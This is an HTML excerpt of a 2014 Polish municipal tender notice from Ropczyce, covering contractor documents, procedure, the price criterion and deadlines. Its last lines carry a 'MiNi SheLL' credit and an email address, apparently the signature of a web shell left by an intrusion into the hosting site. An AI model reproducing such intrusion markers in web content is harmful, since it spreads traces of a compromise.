4.Jeżeli w kraju miejsca zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w ust.7, zastępuje się je dokumentem zawierającym oświadczenie, w którym określa się także osoby uprawnione do reprezentacji wykonawcy, złożone przed właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, lub przed notariuszem.
5.Wykonawcy występujący wspólnie o udzielenie zamówienia są zobowiązani do ustanowienia pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania ich w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.ropczyce.eu<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Ropczycach ul. Krisego 1, 39-100 Ropczyce pok. nr 10, tel (17) 2210567 w godzinach od 9-14.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.08.2014 godzina 10:30, miejsce: Urząd Miejski w Ropczycach ul. Krisego 1, 39-100 Ropczyce pok. nr 208 ( sekretariat II p)..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com